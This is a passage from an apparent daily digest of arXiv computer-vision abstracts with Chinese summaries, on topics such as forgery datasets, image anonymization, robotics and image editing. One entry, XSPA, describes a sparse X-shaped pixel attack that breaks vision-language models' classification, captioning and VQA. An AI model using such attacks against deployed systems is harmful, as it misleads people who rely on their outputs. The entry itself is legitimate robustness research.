a full system retraining. Experimental results demonstrate that this computationally accessible approach offers a scalable and efficient solution for multi-degradation restoration on standard local hardware. The code will be published upon paper acceptance.
[CV-15] GIF2: Extended Text-Guided Inpainting Forgery Dataset Benchmark
【速读】:该论文旨在解决生成式 AI(Generative AI)驱动的文本引导修复(text-guided inpainting)对图像取证技术带来的新挑战,特别是针对完全再生(Fully Regenerated, FR)图像中篡改定位(Image Forgery Localization, IFL)能力不足的问题。现有方法在拼接类伪造图像上表现良好,但在FR图像上失效;而合成图像检测(Synthetic Image Detection, SID)虽能识别FR图像,却无法定位篡改区域。解决方案的关键在于构建TGIF2数据集——其扩展了原始TGIF数据集,引入FLUX.1模型生成的修复内容及随机非语义掩码(random non-semantic masks),从而支持更全面的取证评估。实验表明,当前IFL和SID方法在FLUX.1操纵下性能下降,说明泛化能力有限;尽管微调可提升FR图像上的定位效果,但随机掩码测试暴露了对象偏倚问题;此外,生成式超分辨率显著削弱了取证痕迹,揭示了常见图像增强操作对现有取证流程的破坏性影响。因此,TGIF2为理解现代AI图像编辑与取证鲁棒性之间的鸿沟提供了重要基准。
链接: https://arxiv.org/abs/2603.28613
作者: Hannes Mareen,Dimitrios Karageorgiou,Paschalis Giakoumoglou,Peter Lambert,Symeon Papadopoulos,Glenn Van Wallendael
机构: University of Ghent (根特大学); Institute of Informatics and Telecommunications (信息学与电信研究所)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Cryptography and Security (cs.CR); Multimedia (cs.MM)
备注: 33 pages, accepted at Journal on Information Security
Abstract:Generative AI has made text-guided inpainting a powerful image editing tool, but at the same time a growing challenge for media forensics. Existing benchmarks, including our text-guided inpainting forgery (TGIF) dataset, show that image forgery localization (IFL) methods can localize manipulations in spliced images but struggle not in fully regenerated (FR) images, while synthetic image detection (SID) methods can detect fully regenerated images but cannot perform localization. With new generative inpainting models emerging and the open problem of localization in FR images remaining, updated datasets and benchmarks are needed. We introduce TGIF2, an extended version of TGIF, that captures recent advances in text-guided inpainting and enables a deeper analysis of forensic robustness. TGIF2 augments the original dataset with edits generated by FLUX.1 models, as well as with random non-semantic masks. Using the TGIF2 dataset, we conduct a forensic evaluation spanning IFL and SID, including fine-tuning IFL methods on FR images and generative super-resolution attacks. Our experiments show that both IFL and SID methods degrade on FLUX.1 manipulations, highlighting limited generalization. Additionally, while fine-tuning improves localization on FR images, evaluation with random non-semantic masks reveals object bias. Furthermore, generative super-resolution significantly weakens forensic traces, demonstrating that common image enhancement operations can undermine current forensic pipelines. In summary, TGIF2 provides an updated dataset and benchmark, which enables new insights into the challenges posed by modern inpainting and AI-based image enhancements. TGIF2 is available at this https URL.
[CV-16] Unsafe2Safe: Controllable Image Anonymization for Downstream Utility CVPR2026
【速读】:该论文旨在解决大规模图像数据集中存在的隐私风险问题,即在训练模型时可能因记忆和泄露敏感内容(如人脸、文本信息或可识别的个体特征)而导致隐私侵犯。其解决方案的关键在于提出一个全自动化的隐私保护流水线Unsafe2Safe,该方法通过两阶段流程实现:第一阶段利用视觉-语言模型检测隐私风险并生成包含敏感属性(private caption)与去标识化(public caption)的配对描述,同时由大语言模型生成结构化的、无身份指向的编辑指令;第二阶段采用基于文本提示的扩散编辑器,以双文本提示(私有与公共描述)驱动图像局部重写,在保留全局结构和任务相关语义的同时中性化敏感区域。该方案实现了高隐私保护强度(显著降低人脸相似度、文本相似度及人口统计学可预测性)与下游任务性能之间的平衡,且无需牺牲视觉一致性或数据可用性。
链接: https://arxiv.org/abs/2603.28605
作者: Mih Dinh,SouYoung Jin
机构: Dartmouth College (达特茅斯学院)
类目: Computer Vision and Pattern Recognition (cs.CV); Computers and Society (cs.CY); Machine Learning (cs.LG)
备注: Accepted at CVPR 2026 and CVPR 2026 Workshop on Machine Unlearning for Computer Vision
Abstract:Large-scale image datasets frequently contain identifiable or sensitive content, raising privacy risks when training models that may memorize and leak such information. We present Unsafe2Safe, a fully automated pipeline that detects privacy-prone images and rewrites only their sensitive regions using multimodally guided diffusion editing. Unsafe2Safe operates in two stages. Stage 1 uses a vision-language model to (i) inspect images for privacy risks, (ii) generate paired private and public captions that respectively include and omit sensitive attributes, and (iii) prompt a large language model to produce structured, identity-neutral edit instructions conditioned on the public caption. Stage 2 employs instruction-driven diffusion editors to apply these dual textual prompts, producing privacy-safe images that preserve global structure and task-relevant semantics while neutralizing private content. To measure anonymization quality, we introduce a unified evaluation suite covering Quality, Cheating, Privacy, and Utility dimensions. Across MS-COCO, Caltech101, and MIT Indoor67, Unsafe2Safe reduces face similarity, text similarity, and demographic predictability by large margins, while maintaining downstream model accuracy comparable to training on raw data. Fine-tuning diffusion editors on our automatically generated triplets (private caption, public caption, edit instruction) further improves both privacy protection and semantic fidelity. Unsafe2Safe provides a scalable, principled solution for constructing large, privacy-safe datasets without sacrificing visual consistency or downstream utility.
[CV-17] ELViS: Efficient Visual Similarity from Local Descriptors that Generalizes Across Domains ICLR2026
【速读】:该论文旨在解决大规模实例级训练数据稀缺导致模型在跨域图像检索中泛化能力不足的问题。现有方法通常依赖特定领域的训练数据,难以适应真实场景中多样化的未见领域(unseen domains)。其解决方案的关键在于提出ELViS模型,该模型在相似度空间(similarity space)而非表示空间(representation space)中进行操作,通过利用局部描述符对应关系,结合数据相关的最优传输(optimal transport)机制以抑制无信息描述符,并通过投票机制聚合强对应关系生成图像级相似度,从而引入强归纳偏置(inductive biases),实现高效、可解释且跨域迁移能力强的图像相似性建模。
链接: https://arxiv.org/abs/2603.28603
作者: Pavel Suma,Giorgos Kordopatis-Zilos,Yannis Kalantidis,Giorgos Tolias
机构: Czech Technical University in Prague (捷克技术大学); NAVER LABS Europe (NAVER实验室欧洲)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: ICLR 2026
Abstract:Large-scale instance-level training data is scarce, so models are typically trained on domain-specific datasets. Yet in real-world retrieval, they must handle diverse domains, making generalization to unseen data critical. We introduce ELViS, an image-to-image similarity model that generalizes effectively to unseen domains. Unlike conventional approaches, our model operates in similarity space rather than representation space, promoting cross-domain transfer. It leverages local descriptor correspondences, refines their similarities through an optimal transport step with data-dependent gains that suppress uninformative descriptors, and aggregates strong correspondences via a voting process into an image-level similarity. This design injects strong inductive biases, yielding a simple, efficient, and interpretable model. To assess generalization, we compile a benchmark of eight datasets spanning landmarks, artworks, products, and multi-domain collections, and evaluate ELViS as a re-ranking method. Our experiments show that ELViS outperforms competing methods by a large margin in out-of-domain scenarios and on average, while requiring only a fraction of their computational cost. Code available at: this https URL
[CV-18] Detection of Adversarial Attacks in Robotic Perception
【速读】:该论文旨在解决深度神经网络(Deep Neural Networks, DNNs)在机器人感知任务中进行语义分割时对对抗攻击的脆弱性问题,此类攻击可能危及安全关键应用。解决方案的关键在于针对机器人场景下语义分割的特殊需求,设计专用的模型架构与检测策略,以提升模型在复杂环境中的鲁棒性。
链接: https://arxiv.org/abs/2603.28594
作者: Ziad Sharawy,Mohammad Nakshbandiand,Sorin Mihai Grigorescu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Cryptography and Security (cs.CR); Robotics (cs.RO)
备注: 9 pages, 6 figures. Accepted and presented at STE 2025, Transilvania University of Brasov, Romania
Abstract:Deep Neural Networks (DNNs) achieve strong performance in semantic segmentation for robotic perception but remain vulnerable to adversarial attacks, threatening safety-critical applications. While robustness has been studied for image classification, semantic segmentation in robotic contexts requires specialized architectures and detection strategies.
[CV-19] ORSIFlow: Saliency-Guided Rectified Flow for Optical Remote Sensing Salient Object Detection ICME2026
【速读】:该论文旨在解决光学遥感图像显著目标检测(Optical Remote Sensing Image Salient Object Detection, ORSI-SOD)中因复杂背景、低对比度、不规则目标形状及尺度变化大所带来的挑战。现有判别式方法直接回归显著图,而基于扩散的生成式方法则存在随机采样和高计算成本的问题。其解决方案的关键在于提出ORISFlow框架,将ORSI-SOD重构为一个确定性的潜在流生成问题:通过冻结的变分自编码器(Variational Autoencoder, VAE)构建紧凑潜在空间,在该空间内进行高效推理(仅需几步即可完成显著掩码生成);同时设计了显著特征判别器(Salient Feature Discriminator)以增强全局语义区分能力,并引入显著特征校准器(Salient Feature Calibrator)实现边界精调,从而在多个公开基准上实现最优性能与显著效率提升。
链接: https://arxiv.org/abs/2603.28584
作者: Haojing Chen,Yutong Li,Zhihang Liu,Tao Tan,Haoyu Bian,Qiuju Ma
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Accepted by ICME 2026
Abstract:Optical Remote Sensing Image Salient Object Detection (ORSI-SOD) remains challenging due to complex backgrounds, low contrast, irregular object shapes, and large variations in object scale. Existing discriminative methods directly regress saliency maps, while recent diffusion-based generative approaches suffer from stochastic sampling and high computational cost. In this paper, we propose ORSIFlow, a saliency-guided rectified flow framework that reformulates ORSI-SOD as a deterministic latent flow generation problem. ORSIFlow performs saliency mask generation in a compact latent space constructed by a frozen variational autoencoder, enabling efficient inference with only a few steps. To enhance saliency awareness, we design a Salient Feature Discriminator for global semantic discrimination and a Salient Feature Calibrator for precise boundary refinement. Extensive experiments on multiple public benchmarks show that ORSIFlow achieves state-of-the-art performance with significantly improved efficiency. Codes are available at: this https URL.
[CV-20] Navigating the Mirag e: A Dual-Path Agent ic Framework for Robust Misleading Chart Question Answering
【速读】:该论文旨在解决视觉-语言模型(Vision-Language Models, VLMs)在图表解读中因视觉结构欺骗性和数据表示失真而导致的误导性问题。其核心挑战在于模型易受扭曲的图表设计干扰,从而产生错误推理。解决方案的关键在于提出一种代理式双路径框架 ChartCynics,通过将感知与验证解耦:诊断视觉路径(Diagnostic Vision Path)利用策略性感兴趣区域(ROI)裁剪识别结构异常(如坐标轴翻转),而OCR驱动的数据路径(OCR-Driven Data Path)确保数值信息的准确锚定;进一步引入代理总结器(Agentic Summarizer),通过两阶段优化协议——Oracle-Informed SFT用于推理蒸馏,Deception-Aware GRPO实现对抗对齐——有效惩罚视觉陷阱并强化跨模态逻辑一致性,显著提升模型鲁棒性与准确性。
链接: https://arxiv.org/abs/2603.28583
作者: Yanjie Zhang,Yafei Li,Rui Sheng,Zixin Chen,Yanna Lin,Huamin Qu,Lei Chen,Yushi Sun
机构: HKUST(香港科技大学); HKUST(GZ)(香港科技大学(广州))
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI); Multimedia (cs.MM)
备注: 10pages, 4 figures
Abstract:Despite the success of Vision-Language Models (VLMs), misleading charts remain a significant challenge due to their deceptive visual structures and distorted data representations. We present ChartCynics, an agentic dual-path framework designed to unmask visual deception via a “skeptical” reasoning paradigm. Unlike holistic models, ChartCynics decouples perception from verification: a Diagnostic Vision Path captures structural anomalies (e.g., inverted axes) through strategic ROI cropping, while an OCR-Driven Data Path ensures numerical grounding. To resolve cross-modal conflicts, we introduce an Agentic Summarizer optimized via a two-stage protocol: Oracle-Informed SFT for reasoning distillation and Deception-Aware GRPO for adversarial alignment. This pipeline effectively penalizes visual traps and enforces logical consistency. Evaluations on two benchmarks show that ChartCynics achieves 74.43% and 64.55% accuracy, providing an absolute performance boost of ~29% over the Qwen3-VL-8B backbone, outperforming state-of-the-art proprietary models. Our results demonstrate that specialized agentic workflows can grant smaller open-source models superior robustness, establishing a new foundation for trustworthy chart interpretation.
[CV-21] XSPA: Crafting Imperceptible X-Shaped Sparse Adversarial Perturbations for Transferable Attacks on VLMs
【速读】:该论文旨在解决视觉语言模型(Vision-Language Models, VLMs)在面对高度约束、稀疏且几何固定扰动时的鲁棒性问题。现有研究表明,VLMs 依赖共享的视觉-文本表征空间实现跨任务泛化,但这一特性也可能导致微小的视觉扰动在嵌入空间中传播并引发多任务语义失效,尤其在交互式决策支持场景中构成潜在风险。为更严格地评估这种脆弱性,作者提出 X 形稀疏像素攻击(X-shaped Sparse Pixel Attack, XSPA),其关键在于:在极小扰动预算下(仅修改约 1.76% 像素),将扰动限制于两条相交对角线构成的结构化区域,并联合优化分类目标、跨任务语义引导及扰动幅度与沿线平滑性的正则项,从而诱导出可迁移的误分类以及图像描述和视觉问答(Visual Question Answering, VQA)中的语义漂移,同时保持视觉隐蔽性。实验表明,XSPA 在 COCO 数据集上显著降低多个任务性能,揭示了当前多模态系统在对抗扰动下的显著鲁棒性缺口。
链接: https://arxiv.org/abs/2603.28568
作者: Chengyin Hu,Jiaju Han,Xuemeng Sun,Qike Zhang,Yiwei Wei,Ang Li,Chunlei Meng,Xiang Chen,Jiahuan Long
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Vision-language models (VLMs) rely on a shared visual-textual representation space to perform tasks such as zero-shot classification, image captioning, and visual question answering (VQA). While this shared space enables strong cross-task generalization, it may also introduce a common vulnerability: small visual perturbations can propagate through the shared embedding space and cause correlated semantic failures across tasks. This risk is particularly important in interactive and decision-support settings, yet it remains unclear whether VLMs are robust to highly constrained, sparse, and geometrically fixed perturbations. To address this question, we propose X-shaped Sparse Pixel Attack (XSPA), an imperceptible structured attack that restricts perturbations to two intersecting diagonal lines. Compared with dense perturbations or flexible localized patches, XSPA operates under a much stricter attack budget and thus provides a more stringent test of VLM robustness. Within this sparse support, XSPA jointly optimizes a classification objective, cross-task semantic guidance, and regularization on perturbation magnitude and along-line smoothness, inducing transferable misclassification as well as semantic drift in captioning and VQA while preserving visual subtlety. Under the default setting, XSPA modifies only about 1.76% of image pixels. Experiments on the COCO dataset show that XSPA consistently degrades performance across all three tasks. Zero-shot accuracy drops by 52.33 points on OpenAI CLIP ViT-L/14 and 67.00 points on OpenCLIP ViT-B/16, while GPT-4-evaluated caption consistency decreases by up to 58.60 points and VQA correctness by up to 44.38 points. These results suggest that even highly sparse and visually subtle perturbations with fixed geometric priors can substantially disrupt cross-task semantics in VLMs, revealing a notable robustness gap in current multimodal systems.
[CV-22] StreamingVLA: Streaming Vision-Language-Action Model with Action Flow Matching and Adaptive Early Observation
【速读】:该论文旨在解决视觉-语言-动作(Vision-Language-Action, VLA)模型在资源受限的边缘平台部署时面临的高计算开销与执行延迟问题,尤其是由于VLA各阶段(观测、动作生成与执行)必须串行进行导致的频繁停顿和高延迟。解决方案的关键在于提出一种“流式”异步并行机制,通过两个核心设计实现:其一,摒弃传统的动作分块(action chunking)方式,采用动作流匹配(action flow matching)方法学习连续的动作轨迹,从而将动作生成与执行阶段的延迟重叠;其二,设计基于动作显著性感知的自适应观测机制,使执行阶段与观测阶段的延迟得以重叠。该方案在不牺牲性能的前提下,实现了2.4倍的延迟加速,并将执行停顿次数减少6.5倍。
链接: https://arxiv.org/abs/2603.28565
作者: Yiran Shi,Dongqi Guo,Tianchen Zhao,Feng Gao,Liangzhi Shi,Chao Yu,ZhiJian Mo,Qihua Xiao,XiaoShuai Peng,Qingmin Liao,Yu Wang
机构: 未知
类目: Robotics (cs.RO); Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Vision-language-action (VLA) models have demonstrated exceptional performance in natural language-driven perception and control. However, the high computational cost of VLA models poses significant efficiency challenges, particularly for resource-constrained edge platforms in real-world deployments. However, since different stages of VLA (observation, action generation and execution) must proceed sequentially, and wait for the completion of the preceding stage, the system suffers from frequent halting and high latency. To address this, We conduct a systematic analysis to identify the challenges for fast and fluent generation, and propose enabling VLAs with the ability to asynchronously parallelize across VLA stages in a “streaming” manner. First, we eliminate the reliance on action chunking and adopt action flow matching, which learns the trajectory of action flows rather than denoising chunk-wise actions. It overlaps the latency of action generation and execution. Second, we design an action saliency-aware adaptive observation mechanism, thereby overlapping the latency of execution and observation. Without sacrificing performance, StreamingVLA achieves substantial speedup and improves the fluency of execution. It achieves a 2.4 \times latency speedup and reduces execution halting by 6.5 \times .
[CV-23] Curriculum-Guided Myocardial Scar Segmentation for Ischemic and Non-ischemic Cardiomyopathy
【速读】:该论文旨在解决从晚期钆增强心脏磁共振(Late Gadolinium Enhancement Cardiac Magnetic Resonance, LGE-CMR)图像中可靠分割心肌瘢痕的难题,尤其针对因患者间对比增强差异、成像条件不佳(如造影剂洗脱)以及弥散性瘢痕标注不一致(由观察者间变异引起)导致的分割性能下降问题。解决方案的关键在于提出一种基于课程学习(curriculum learning)的框架,通过设计一种渐进式训练策略,引导模型从高置信度、边界清晰的瘢痕区域逐步过渡到低置信度或视觉模糊的样本(尤其是瘢痕负荷较小的情况),从而提升模型对不确定标签和细微瘢痕特征的鲁棒性,显著改善在临床实际中难以处理的微小或弥散性瘢痕的分割准确性和一致性。
链接: https://arxiv.org/abs/2603.28560
作者: Nivetha Jayakumar,Jonathan Pan,Shuo Wang,Bishow Paudel,Nisha Hosadurg,Cristiane C. Singulane,Sivam Bhatt,Amit R. Patel,Miaomiao Zhang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Identification and quantification of myocardial scar is important for diagnosis and prognosis of cardiovascular diseases. However, reliable scar segmentation from Late Gadolinium Enhancement Cardiac Magnetic Resonance (LGE-CMR) images remains a challenge due to variations in contrast enhancement across patients, suboptimal imaging conditions such as post contrast washout, and inconsistencies in ground truth annotations on diffuse scars caused by inter observer variability. In this work, we propose a curriculum learning-based framework designed to improve segmentation performance under these challenging conditions. The method introduces a progressive training strategy that guides the model from high-confidence, clearly defined scar regions to low confidence or visually ambiguous samples with limited scar burden. By structuring the learning process in this manner, the network develops robustness to uncertain labels and subtle scar appearances that are often underrepresented in conventional training pipelines. Experimental results show that the proposed approach enhances segmentation accuracy and consistency, particularly for cases with minimal or diffuse scar, outperforming standard training baselines. This strategy provides a principled way to leverage imperfect data for improved myocardial scar quantification in clinical applications. Our code is publicly available on GitHub.
[CV-24] Domain-Invariant Prompt Learning for Vision-Language Models
【速读】:该论文旨在解决大型预训练视觉语言模型(如CLIP)在面对未见分布时的域偏移(domain shift)问题,即模型在跨域场景下性能下降的问题。现有方法如Context Optimization (CoOp) 虽能通过学习上下文向量实现下游任务适配,但缺乏对域不变性的显式建模机制。解决方案的关键在于提出Domain-invariant Context Optimization (DiCoOp),其核心是引入对抗训练策略,在优化分类判别能力的同时强制模型学习对不同域具有不变性的提示(prompt),从而提升模型在多样视觉域上的泛化能力。
链接: https://arxiv.org/abs/2603.28555
作者: Arsham Gholamzadeh Khoee,Yinan Yu,Robert Feldt
机构: Chalmers University of Technology (查尔姆斯理工大学)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:Large pre-trained vision-language models like CLIP have transformed computer vision by aligning images and text in a shared feature space, enabling robust zero-shot transfer via prompting. Soft-prompting, such as Context Optimization (CoOp), effectively adapts these models for downstream recognition tasks by learning a set of context vectors. However, CoOp lacks explicit mechanisms for handling domain shifts across unseen distributions. To address this, we propose Domain-invariant Context Optimization (DiCoOp), an extension of CoOp optimized for domain generalization. By employing an adversarial training approach, DiCoOp forces the model to learn domain-invariant prompts while preserving discriminative power for classification. Experimental results show that DiCoOp consistently surpasses CoOp in domain generalization tasks across diverse visual domains.
[CV-25] MarkushGrapher-2: End-to-end Multimodal Recognition of Chemical Structures CVPR2026
【速读】:该论文旨在解决从多模态文档中自动识别Markush结构(Markush structures)的精度不足问题,此类结构常出现在专利文献中,其复杂性导致现有方法难以实现大规模自动化处理。解决方案的关键在于提出MarkushGrapher-2,一个端到端的多模态识别框架:首先利用专用光学字符识别(OCR)模型提取化学图像中的文本;其次通过视觉-文本-布局编码器(Vision-Text-Layout encoder)与光学化学结构识别视觉编码器联合编码图像、文本和布局信息;最后采用两阶段训练策略融合特征并自回归生成Markush结构表示。此外,为缓解数据稀缺问题,作者构建了大规模真实世界Markush结构数据集,并发布了IP5-M基准数据集以推动该领域研究进展。
链接: https://arxiv.org/abs/2603.28550
作者: Tim Strohmeyer,Lucas Morin,Gerhard Ingmar Meijer,Valéry Weber,Ahmed Nassar,Peter Staar
机构: IBM Research(IBM研究院); ETH Zurich(苏黎世联邦理工学院)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 15 pages, to be published in CVPR 2026
Abstract:Automatically extracting chemical structures from documents is essential for the large-scale analysis of the literature in chemistry. Automatic pipelines have been developed to recognize molecules represented either in figures or in text independently. However, methods for recognizing chemical structures from multimodal descriptions (Markush structures) lag behind in precision and cannot be used for automatic large-scale processing. In this work, we present MarkushGrapher-2, an end-to-end approach for the multimodal recognition of chemical structures in documents. First, our method employs a dedicated OCR model to extract text from chemical images. Second, the text, image, and layout information are jointly encoded through a Vision-Text-Layout encoder and an Optical Chemical Structure Recognition vision encoder. Finally, the resulting encodings are effectively fused through a two-stage training strategy and used to auto-regressively generate a representation of the Markush structure. To address the lack of training data, we introduce an automatic pipeline for constructing a large-scale dataset of real-world Markush structures. In addition, we present IP5-M, a large manually-annotated benchmark of real-world Markush structures, designed to advance research on this challenging task. Extensive experiments show that our approach substantially outperforms state-of-the-art models in multimodal Markush structure recognition, while maintaining strong performance in molecule structure recognition. Code, models, and datasets are released publicly.
[CV-26] Seen2Scene: Completing Realistic 3D Scenes with Visibility-Guided Flow WWW ATC
【速读】:该论文旨在解决现有3D场景补全与生成方法依赖完整且合成的3D数据,难以在真实、不完整观测条件下实现高质量重建的问题。其关键解决方案是提出Seen2Scene,一种基于流匹配(flow matching)的方法,直接在不完整的真实3D扫描上训练,通过引入可见性引导的流匹配机制显式掩码未知区域,从而有效利用真实世界的局部观测进行学习;同时采用截断有符号距离场(TSDF)体积表示和稀疏Transformer架构,在保持复杂场景结构建模能力的同时,实现对缺失区域的合理推理与补全。
链接: https://arxiv.org/abs/2603.28548
作者: Quan Meng,Yujin Chen,Lei Li,Matthias Nießner,Angela Dai
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Project page: this https URL Video: this https URL
Abstract:We present Seen2Scene, the first flow matching-based approach that trains directly on incomplete, real-world 3D scans for scene completion and generation. Unlike prior methods that rely on complete and hence synthetic 3D data, our approach introduces visibility-guided flow matching, which explicitly masks out unknown regions in real scans, enabling effective learning from real-world, partial observations. We represent 3D scenes using truncated signed distance field (TSDF) volumes encoded in sparse grids and employ a sparse transformer to efficiently model complex scene structures while masking unknown regions. We employ 3D layout boxes as an input conditioning signal, and our approach is flexibly adapted to various other inputs such as text or partial scans. By learning directly from real-world, incomplete 3D scans, Seen2Scene enables realistic 3D scene completion for complex, cluttered real environments. Experiments demonstrate that our model produces coherent, complete, and realistic 3D scenes, outperforming baselines in completion accuracy and generation quality.
[CV-27] GEditBench v2: A Human-Aligned Benchmark for General Image Editing
【速读】:该论文旨在解决当前图像编辑模型评估框架中存在的两大问题:一是现有基准测试任务覆盖范围狭窄,难以全面反映模型在真实场景下的能力;二是标准评价指标无法有效衡量视觉一致性(visual consistency),即编辑前后图像在身份、结构和语义层面的一致性。其解决方案的关键在于提出GEditBench v2基准测试平台与PVC-Judge评估模型:GEditBench v2包含1200个真实用户查询,涵盖23项任务并引入开放集类别以支持未定义的编辑指令;PVC-Judge则通过两种新颖的区域解耦偏好数据合成流水线训练而成,能够更精准地评估视觉一致性,并在VCReward-Bench上验证其与人类判断高度对齐,甚至优于GPT-5.1。
链接: https://arxiv.org/abs/2603.28547
作者: Zhangqi Jiang,Zheng Sun,Xianfang Zeng,Yufeng Yang,Xuanyang Zhang,Yongliang Wu,Wei Cheng,Gang Yu,Xu Yang,Bihan Wen
机构: Nanyang Technological University(南洋理工大学); StepFun; Southeast University(东南大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: 30 pages, 24 figures
Abstract:Recent advances in image editing have enabled models to handle complex instructions with impressive realism. However, existing evaluation frameworks lag behind: current benchmarks suffer from narrow task coverage, while standard metrics fail to adequately capture visual consistency, i.e., the preservation of identity, structure and semantic coherence between edited and original images. To address these limitations, we introduce GEditBench v2, a comprehensive benchmark with 1,200 real-world user queries spanning 23 tasks, including a dedicated open-set category for unconstrained, out-of-distribution editing instructions beyond predefined tasks. Furthermore, we propose PVC-Judge, an open-source pairwise assessment model for visual consistency, trained via two novel region-decoupled preference data synthesis pipelines. Besides, we construct VCReward-Bench using expert-annotated preference pairs to assess the alignment of PVC-Judge with human judgments on visual consistency evaluation. Experiments show that our PVC-Judge achieves state-of-the-art evaluation performance among open-source models and even surpasses GPT-5.1 on average. Finally, by benchmarking 16 frontier editing models, we show that GEditBench v2 enables more human-aligned evaluation, revealing critical limitations of current models, and providing a reliable foundation for advancing precise image editing.
[CV-28] ManipArena: Comprehensive Real-world Evaluation of Reasoning -Oriented Generalist Robot Manipulation CVPR2026
【速读】:该论文旨在解决当前视觉-语言-动作(Vision-Language-Action, VLA)模型与世界模型在机器人智能领域发展中面临的评估瓶颈问题,即现有基准测试主要依赖仿真环境,难以反映真实场景中的感知噪声、复杂接触动力学、硬件限制及系统延迟等“现实差距”(reality gap),且不同机器人平台间的实验碎片化导致公平性和可复现性不足。解决方案的关键在于提出ManipArena这一标准化评估框架,其核心包括:1)涵盖10,812条专家轨迹的20个多样化任务,聚焦语义与空间推理导向的操作任务;2)通过受控的分布外设置支持多层级泛化能力评估;3)扩展至长周期移动操作任务,超越桌面场景限制;4)提供丰富的传感诊断信息(如低级电机信号)及高保真3D扫描构建的真实-仿真同步环境,从而实现对VLA和世界模型方法的公平、真实且可复现的评估,为具身智能系统的诊断与演进提供可扩展基础。
链接: https://arxiv.org/abs/2603.28545
作者: Yu Sun,Meng Cao,Ping Yang,Rongtao Xu,Yunxiao Yan,Runze Xu,Liang Ma,Roy Gan,Andy Zhai,Qingxuan Chen,Zunnan Xu,Hao Wang,Jincheng Yu,Lucy Liang,Qian Wang,Ivan Laptev,Ian D Reid,Xiaodan Liang
机构: 未知
类目: Robotics (cs.RO); Computer Vision and Pattern Recognition (cs.CV)
备注: Technical report for CVPR 2026 Challenge ManipArena
Abstract:Vision-Language-Action (VLA) models and world models have recently emerged as promising paradigms for general-purpose robotic intelligence, yet their progress is hindered by the lack of reliable evaluation protocols that reflect real-world deployment. Existing benchmarks are largely simulator-centric, which provide controllability but fail to capture the reality gap caused by perception noise, complex contact dynamics, hardware constraints, and system latency. Moreover, fragmented real-world evaluations across different robot platforms prevent fair and reproducible comparison. To address these challenges, we introduce ManipArena, a standardized evaluation framework designed to bridge simulation and real-world execution. ManipArena comprises 20 diverse tasks across 10,812 expert trajectories emphasizing reasoning-oriented manipulation tasks requiring semantic and spatial reasoning, supports multi-level generalization through controlled out-of-distribution settings, and incorporates long-horizon mobile manipulation beyond tabletop scenarios. The framework further provides rich sensory diagnostics, including low-level motor signals, and synchronized real-to-sim environments constructed via high-quality 3D scanning. Together, these features enable fair, realistic, and reproducible evaluation for both VLA and world model approaches, providing a scalable foundation for diagnosing and advancing embodied intelligence systems.
[CV-29] RAD-LAD: Rule and Language Grounded Autonomous Driving in Real-Time
【速读】:该论文旨在解决自动驾驶中语言驱动决策与运动规划的实时性与性能瓶颈问题,特别是现有方法在延迟和泛化能力上的不足。其核心解决方案是提出LAD(Language–Action Planner),一种具有可中断架构的实时语言-动作规划器,能够在单次前向传播中以约20 Hz的速度生成运动规划,或在约10 Hz下同步输出文本推理与运动规划,显著降低延迟(比先前驾驶语言模型快约3倍)并提升nuPlan Test14-Hard和InterPlan基准上的学习基线性能;同时引入RAD(Rule-based Action Planner),用于克服PDM-Closed结构限制,并在规则类规划器中达到最优表现;最终通过融合RAD与LAD构建混合规划系统,实现规则可靠性与语言自适应性及可解释性的互补协同,从而兼顾安全性与灵活性。
链接: https://arxiv.org/abs/2603.28522
作者: Anurag Ghosh,Srinivasa Narasimhan,Manmohan Chandraker,Francesco Pittaluga
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Computer Vision and Pattern Recognition (cs.CV); Machine Learning (cs.LG)
备注:
Abstract:We present LAD, a real-time language–action planner with an interruptible architecture that produces a motion plan in a single forward pass (~20 Hz) or generates textual reasoning alongside a motion plan (~10 Hz). LAD is fast enough for real-time closed-loop deployment, achieving ~3x lower latency than prior driving language models while setting a new learning-based state of the art on nuPlan Test14-Hard and InterPlan. We also introduce RAD, a rule-based planner designed to address structural limitations of PDM-Closed. RAD achieves state-of-the-art performance among rule-based planners on nuPlan Test14-Hard and InterPlan. Finally, we show that combining RAD and LAD enables hybrid planning that captures the strengths of both approaches. This hybrid system demonstrates that rules and learning provide complementary capabilities: rules support reliable maneuvering, while language enables adaptive and explainable decision-making.
[CV-30] Generalizable Detection of AI Generated Images with Large Models and Fuzzy Decision Tree
【速读】:该论文旨在解决生成式 AI (Generative AI) 生成图像的恶意使用与广泛传播对数字内容真实性造成的威胁,特别是现有检测方法因模型特异性过拟合而泛化能力不足的问题。解决方案的关键在于提出一种新颖的检测框架,通过模糊决策树(fuzzy decision tree)协同融合轻量级感知型人工痕迹检测器与多模态大语言模型(Multimodal Large Language Models, MLLMs),将基础检测器的输出作为模糊隶属度值,实现语义层面与感知层面互补信息的自适应融合,从而在多种生成模型上均展现出卓越的检测准确率和强泛化能力。
链接: https://arxiv.org/abs/2603.28508
作者: Fei Wu,Guanghao Ding,Zijian Niu,Zhenrui Wang,Lei Yang,Zhuosheng Zhang,Shilin Wang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:The malicious use and widespread dissemination of AI-generated images pose a serious threat to the authenticity of digital content. Existing detection methods exploit low-level artifacts left by common manipulation steps within the generation pipeline, but they often lack generalization due to model-specific overfitting. Recently, researchers have resorted to Multimodal Large Language Models (MLLMs) for AIGC detection, leveraging their high-level semantic reasoning and broad generalization capabilities. While promising, MLLMs lack the fine-grained perceptual sensitivity to subtle generation artifacts, making them inadequate as standalone detectors. To address this issue, we propose a novel AI-generated image detection framework that synergistically integrates lightweight artifact-aware detectors with MLLMs via a fuzzy decision tree. The decision tree treats the outputs of basic detectors as fuzzy membership values, enabling adaptive fusion of complementary cues from semantic and perceptual perspectives. Extensive experiments demonstrate that the proposed method achieves 